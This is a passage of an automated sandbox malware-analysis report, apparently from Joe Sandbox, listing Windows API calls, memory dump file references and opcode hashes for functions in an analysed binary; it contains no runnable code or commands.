                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 514040917-0
                                                                                                                                                                        • Opcode ID: 865520d10780318f970f547daf0b5d31f57344f31ebeba7182cb1bf40354999d
                                                                                                                                                                        • Instruction ID: ca51c279364ed7a34ef5123a08d486975300b9fc14ea94294c6df30e4677ebe0
                                                                                                                                                                        • Opcode Fuzzy Hash: 865520d10780318f970f547daf0b5d31f57344f31ebeba7182cb1bf40354999d
                                                                                                                                                                        • Instruction Fuzzy Hash: 7AE086F63406109FD300E768ECCCE6E3764AB84715F194150F60187351FA705806C791
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000008), ref: 00433588
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: 144f5fb574037bd5d6c51d15a0cfce4e6123258bf981e09d139c33bf5d0938cc
                                                                                                                                                                        • Instruction ID: 9ca681006a4df8a2f42092306652462c7e591157bf43050be3e71ff09d3458ee
                                                                                                                                                                        • Opcode Fuzzy Hash: 144f5fb574037bd5d6c51d15a0cfce4e6123258bf981e09d139c33bf5d0938cc
                                                                                                                                                                        • Instruction Fuzzy Hash: 7FE0E579210A059FE708CF64E8A4A2A33A5FF48708B128069E945DB3A1DA70AC01CB51
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConnectInternet
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3050416762-0
                                                                                                                                                                        • Opcode ID: d8bdd812af22da76226ce8ec8597369cd6329b795b9649a49ea347b5d7ed01be
                                                                                                                                                                        • Instruction ID: 39c588309585c59699f010394ec1bf5a852f07e64b85a41ba6658fda9e5a6e49
                                                                                                                                                                        • Opcode Fuzzy Hash: d8bdd812af22da76226ce8ec8597369cd6329b795b9649a49ea347b5d7ed01be
                                                                                                                                                                        • Instruction Fuzzy Hash: 51F01C709097128FE314DF69D48066AB7F1BFC4646F14C62DE49497325EB709492CB46
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Enum
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2928410991-0
                                                                                                                                                                        • Opcode ID: 2c27bef4d936512bbc752b58650beefcb4077d5bc70cc4f6d228be923db93273
                                                                                                                                                                        • Instruction ID: bbf64815b54bf9c94cd81a65c3275e642d5f320fee5b34f5521ab9218da8d40b
                                                                                                                                                                        • Opcode Fuzzy Hash: 2c27bef4d936512bbc752b58650beefcb4077d5bc70cc4f6d228be923db93273
                                                                                                                                                                        • Instruction Fuzzy Hash: DEF01C71B18341DFD745DF29C59062ABBE1BFC8304F108A5DD48987314D7B098808F86
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,0066C2C5,00000000,00000000,?,?), ref: 004312A2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        • Opcode ID: 2ff90431de702270fc42ed0d686eb3fc24d6bf07174c7d0b39419fccb37daa3c
                                                                                                                                                                        • Instruction ID: 92a58d818af6cae4a7dc8d13fc8b1eb1d644e38e299c0ee5d789538d1fbc94b1
                                                                                                                                                                        • Opcode Fuzzy Hash: 2ff90431de702270fc42ed0d686eb3fc24d6bf07174c7d0b39419fccb37daa3c
                                                                                                                                                                        • Instruction Fuzzy Hash: 6FE04F31211550EFDA108F0AED4CDC7BFB5EFCC762B10006AF54446120D3729C55DB92
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 00433384
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                        • Opcode ID: d11945b5f68df22360419d1156e5013d8be46c824921572bef4fe2f4b0a2849e
                                                                                                                                                                        • Instruction ID: 4b251624aa07dd3db4fb81a5d44ae2743ede4de0d8738a09d87ee3887743dc91
                                                                                                                                                                        • Opcode Fuzzy Hash: d11945b5f68df22360419d1156e5013d8be46c824921572bef4fe2f4b0a2849e
                                                                                                                                                                        • Instruction Fuzzy Hash: FBE01A7E2007049FC214DF25EC40C5AB36AABC5B60F164655E82193799EB30BC458A92
                                                                                                                                                                        APIs
                                                                                                                                                                        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041CF36
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                        • Opcode ID: 2cf633d664c77f324ec7598e35559c83902c4fa31a4fae02eeb5ded1a0d98cf8
                                                                                                                                                                        • Instruction ID: 9ea92d9f785d14e1f87feaab6690cc9bddbe39b4cb883192013e7fb7717599b8
                                                                                                                                                                        • Opcode Fuzzy Hash: 2cf633d664c77f324ec7598e35559c83902c4fa31a4fae02eeb5ded1a0d98cf8
                                                                                                                                                                        • Instruction Fuzzy Hash: C2E06575204202EFC348CF14D8C0E5AB7B9FF49300F01456DE901CB261E7B0A880CF92
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: c26b6679ef2b96923ee5fbd9e6368894b4bedd977cf751cd5a3767e5c7d6b841
                                                                                                                                                                        • Instruction ID: 790e08f4817875435399588cb89aa9c07f2d3dc702fbb2cdf1cf53b7f6f4bfce
                                                                                                                                                                        • Opcode Fuzzy Hash: c26b6679ef2b96923ee5fbd9e6368894b4bedd977cf751cd5a3767e5c7d6b841
                                                                                                                                                                        • Instruction Fuzzy Hash: 27E06D725146108BD300DF68DD9036977F1FF94218F09462CC850A31B1EBB4AA9ACB86
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentHwProfileA.ADVAPI32(?), ref: 00431091
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentProfile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2104809126-0
                                                                                                                                                                        • Opcode ID: 5c79d7a4dfda38c70779f91f274cc9801959aa902c3fd4f34b2b491e23c98db7
                                                                                                                                                                        • Instruction ID: 4e38f094da93f91ee93a3b753f4728bb631030d9733e544911c6ba1f3b56ea36
                                                                                                                                                                        • Opcode Fuzzy Hash: 5c79d7a4dfda38c70779f91f274cc9801959aa902c3fd4f34b2b491e23c98db7
                                                                                                                                                                        • Instruction Fuzzy Hash: C1E0C2762022005BE324DF39ECA0E9B37A8AFC2744F01483CEA5587355EB70E80487D2
                                                                                                                                                                        APIs
                                                                                                                                                                        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041E17C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
